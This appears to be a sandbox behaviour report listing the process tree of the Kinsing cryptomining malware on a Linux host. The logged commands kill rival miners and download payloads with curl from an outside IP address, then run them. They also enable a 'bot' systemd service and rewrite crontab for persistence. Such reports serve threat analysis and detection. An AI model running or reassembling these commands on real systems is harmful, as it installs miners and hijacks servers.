/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1447
-
-
/usr/bin/idid -u2⤵PID:1448
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1449 -
/usr/sbin/sendmailsendmail -t3⤵PID:1452
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGB4-0000NQ-5h4⤵
- Reads CPU attributes
PID:1466
-
-
-
/usr/sbin/sendmailsendmail -t3⤵
- Reads runtime system information
PID:1455 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmGB4-0000NT-6N4⤵
- Reads CPU attributes
PID:1465
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1456
-
-
-
/usr/bin/idid -u2⤵PID:1457
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1458
-
-
/bin/unameuname -m2⤵PID:1459
-
-
/bin/lsls -la /etc/data2⤵PID:1461
-
-
/bin/grepgrep -v grep2⤵PID:1463
-
-
/bin/grepgrep -e /dev2⤵PID:1462
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
PID:1464
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
PID:1467
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1469
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1470
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
PID:1471
-
-
/usr/bin/pkillpkill -f sysupdater2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1472
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1475
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
PID:1476
-
-
/bin/grepgrep :14142⤵PID:1478
-
-
/bin/grepgrep -v -2⤵PID:1481
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1479
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1480
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1482
-
-
/bin/grepgrep -v grep2⤵PID:1485
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1486
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1487
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1484
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1483
-
-
/bin/grepgrep -v grep2⤵PID:1490
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1488
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1491
-
-
/bin/grepgrep stratum2⤵PID:1489
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1492
-
-
/bin/grepgrep Sofia2⤵PID:1494
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1493
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1497
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1496
-
-
/bin/grepgrep -v grep2⤵PID:1495
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
PID:1498
-
-
/bin/grepgrep tracepath2⤵PID:1500
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1499
-
-
/bin/grepgrep -v grep2⤵PID:1501
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1502
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1503
-
-
/bin/grepgrep /dot2⤵PID:1505
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1504
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1508
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1507
-
-
/bin/grepgrep -v grep2⤵PID:1506
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1510
-
-
/bin/grepgrep -v grep2⤵PID:1511
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1512
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1513
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1509
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1515
-
-
/bin/grepgrep -v grep2⤵PID:1516
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1514
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1518
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1517
-
-
/bin/grepgrep "bash -k"2⤵PID:1520
-
-
/bin/grepgrep -v grep2⤵PID:1521
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1519
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1522
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1523
-
-
/bin/grepgrep -v grep2⤵PID:1526
-
-
/bin/grepgrep perfctl2⤵PID:1525
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1524
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1527
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1528
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1529
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
PID:1530
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1534
-
-
/bin/grepgrep -v grep2⤵PID:1533
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1535
-
-
/bin/grepgrep ./ll12⤵PID:1532
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1531
-
-
/bin/grepgrep -v grep2⤵PID:1538
-
-
/bin/grepgrep agetty2⤵PID:1537
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1536
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1540
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1539
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵PID:1541
-
-
/bin/grepgrep 207.38.87.62⤵PID:1543
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1544
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1545
-
-
/bin/grepgrep -v -2⤵PID:1546
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1547
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1549
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1550
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1551
-
-
/bin/grepgrep -v -2⤵PID:1552
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1553
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1555
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1556
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1557
-
-
/bin/grepgrep -v -2⤵PID:1558
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1559
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1562
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1563
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1561
-
-
/bin/grepgrep -v -2⤵PID:1564
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1565
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1568
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1569
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1567
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1571
-
-
/bin/grepgrep -v -2⤵PID:1570
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
PID:1572
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
PID:1573
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
- Reads runtime system information
PID:1574
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads runtime system information
PID:1575
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1576
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1577
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1578
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
PID:1580
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1581
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
PID:1582
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1583
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
PID:1584
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1585
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1586
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
PID:1587
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1588
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1589
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
PID:1590
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1591
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
- Reads runtime system information
PID:1592
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1593
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1594
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1595
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1596
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1597
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
PID:1598
-
-
/bin/grepgrep ./udp2⤵PID:1600
-
-
/bin/grepgrep -v grep2⤵PID:1601
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1599
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1602
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1603
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1604
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1606
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1605
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1607
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1609
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1608
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1610
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1611
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1612
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1613
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1614
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1615
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1616
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1618
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1617
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1619
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1621
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1620
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1622
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1623
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1624
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1625
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1626
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1627
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1628
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1630
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1629
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1631
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1633
-
-
/bin/catcat /data/./oka.pid2⤵PID:1632
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1634
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1636
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1635
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1637
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1639
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1638
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
PID:1640
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1641
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1642
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
PID:1643
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1644
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
PID:1645
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1646
-
-
/bin/grepgrep -v grep2⤵PID:1649
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1650
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1651
-
-
/bin/grepgrep ./oka2⤵PID:1648
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1647
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1653
-
-
/bin/grepgrep -v grep2⤵PID:1654
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1652
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1655
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1656
-
-
/bin/grepgrep -v bin2⤵PID:1659
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
PID:1657
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1658
-
-
/bin/grepgrep -v "\\["2⤵PID:1660
-
-
/bin/grepgrep -v "("2⤵PID:1661
-
-
/bin/grepgrep -v php-fpm2⤵PID:1662
-
-
/bin/grepgrep -v proxymap2⤵PID:1663
-
-
/bin/grepgrep -v postgres2⤵PID:1664
-
-
/bin/grepgrep -v postgrey2⤵PID:1665
-
-
/bin/grepgrep -v kinsing2⤵PID:1666
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1667
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1668
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1670
-
-
/bin/grepgrep -v bin2⤵PID:1671
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1669
-
-
/bin/grepgrep -v "\\["2⤵PID:1672
-
-
/bin/grepgrep -v "("2⤵PID:1673
-
-
/bin/grepgrep -v php-fpm2⤵PID:1674
-
-
/bin/grepgrep -v proxymap2⤵PID:1675
-
-
/bin/grepgrep -v postgres2⤵PID:1676
-
-
/bin/grepgrep -v postgrey2⤵PID:1677
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1678
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1679
-
-
/bin/grepgrep -v bin2⤵PID:1682
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1680
-
-
/bin/grepgrep -v "\\["2⤵PID:1683
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1681
-
-
/bin/grepgrep -v "("2⤵PID:1684
-
-
/bin/grepgrep -v php-fpm2⤵PID:1685
-
-
/bin/grepgrep -v proxymap2⤵PID:1686
-
-
/bin/grepgrep -v postgres2⤵PID:1687
-
-
/bin/grepgrep -v postgrey2⤵PID:1688
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1689
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1690
-
-
/bin/grepgrep -v grep2⤵PID:1692
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1693
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1691
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1694
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1695
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1699
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1698
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1700
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1701
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1702
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1703
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1706
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1707
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1710
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1711
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1712
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1713
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1714
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1717
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1718
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1719
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1720
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1721
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1725
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1724
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1726
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1727
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1728
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1729
-
-
/usr/bin/idid -u2⤵PID:1731
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1732
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1745
-
-
/bin/sedsed /base64/d2⤵PID:1750
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1751
-
-
/usr/bin/crontabcrontab -l2⤵PID:1749
-
-
/bin/sedsed /_cron/d2⤵PID:1753
-
-
/usr/bin/crontabcrontab -l2⤵PID:1752
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1754
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1756
-
-
/usr/bin/crontabcrontab -l2⤵PID:1755
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1757
-
-
/bin/sedsed /update.sh/d2⤵PID:1759
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1760
-
-
/usr/bin/crontabcrontab -l2⤵PID:1758
-
-
/bin/sedsed /logo4/d2⤵PID:1762
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1763
-
-
/usr/bin/crontabcrontab -l2⤵PID:1761
-
-
/bin/sedsed /logo9/d2⤵PID:1765
-
-
/usr/bin/crontabcrontab -l2⤵PID:1764
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1766
-
-
/bin/sedsed /logo0/d2⤵PID:1768
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1769
-
-
/usr/bin/crontabcrontab -l2⤵PID:1767
-
-
/bin/sedsed /logo/d2⤵PID:1771
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1772
-
-
/usr/bin/crontabcrontab -l2⤵PID:1770
-
-
/bin/sedsed /tor2web/d2⤵PID:1774
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1775
-
-
/usr/bin/crontabcrontab -l2⤵PID:1773
-
-
/bin/sedsed /jpg/d2⤵PID:1777
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1778
-
-
/usr/bin/crontabcrontab -l2⤵PID:1776
-
-
/bin/sedsed /png/d2⤵PID:1780
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1781
-
-
/usr/bin/crontabcrontab -l2⤵
- Reads runtime system information
PID:1779
-
-
/bin/sedsed /tmp/d2⤵PID:1783
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1784
-
-
/usr/bin/crontabcrontab -l2⤵PID:1782
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1786
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1787
-
-
/usr/bin/crontabcrontab -l2⤵PID:1785
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1789
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1790
-
-
/usr/bin/crontabcrontab -l2⤵PID:1788
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1792
-
-
/usr/bin/crontabcrontab -l2⤵PID:1791
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1793
-
-
/bin/sedsed /pastebin/d2⤵PID:1795
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1796
-
-
/usr/bin/crontabcrontab -l2⤵PID:1794
-
-
/bin/sedsed /onion/d2⤵PID:1798
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1799
-
-
/usr/bin/crontabcrontab -l2⤵PID:1797
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1802
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1801
-
-
/usr/bin/crontabcrontab -l2⤵PID:1800
-
-
/bin/sedsed /shuf/d2⤵PID:1807
-
-
/usr/bin/crontabcrontab -l2⤵PID:1806
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1808
-
-
/bin/sedsed /ash/d2⤵PID:1810
-
-
/usr/bin/crontabcrontab -l2⤵PID:1809
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1811
-
-
/bin/sedsed /mr.sh/d2⤵PID:1813
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1814
-
-
/usr/bin/crontabcrontab -l2⤵PID:1812
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1816
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1817
-
-
/usr/bin/crontabcrontab -l2⤵PID:1815
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1819
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1820
-
-
/usr/bin/crontabcrontab -l2⤵PID:1818
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1822
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1823
-
-
/usr/bin/crontabcrontab -l2⤵PID:1821
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1825
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1826
-
-
/usr/bin/crontabcrontab -l2⤵PID:1824
-
-
/bin/sedsed /github/d2⤵PID:1828
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1829
-
-
/usr/bin/crontabcrontab -l2⤵PID:1827
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1832
-
-
/usr/bin/crontabcrontab -l2⤵PID:1830
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1831
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1834
-
-
/usr/bin/crontabcrontab -l2⤵PID:1833
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1835
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1837
-
-
/usr/bin/crontabcrontab -l2⤵PID:1836
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1838
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1840
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1841
-
-
/usr/bin/crontabcrontab -l2⤵PID:1839
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1843
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1844
-
-
/usr/bin/crontabcrontab -l2⤵PID:1842
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1846
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1847
-
-
/usr/bin/crontabcrontab -l2⤵PID:1845
-
-
/bin/sedsed /newdat.sh/d2⤵PID:1849
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1850
-
-
/usr/bin/crontabcrontab -l2⤵PID:1848
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1853
-
-
/bin/sedsed /lib.pygensim.com/d2⤵PID:1852
-
-
/usr/bin/crontabcrontab -l2⤵PID:1851
-
-
/bin/sedsed /t.amynx.com/d2⤵PID:1855
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1856
-
-
/usr/bin/crontabcrontab -l2⤵PID:1854
-
-
/bin/sedsed /update.sh/d2⤵PID:1861
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1862
-
-
/usr/bin/crontabcrontab -l2⤵PID:1860
-
-
/bin/sedsed /systemd-service.sh/d2⤵PID:1864
-
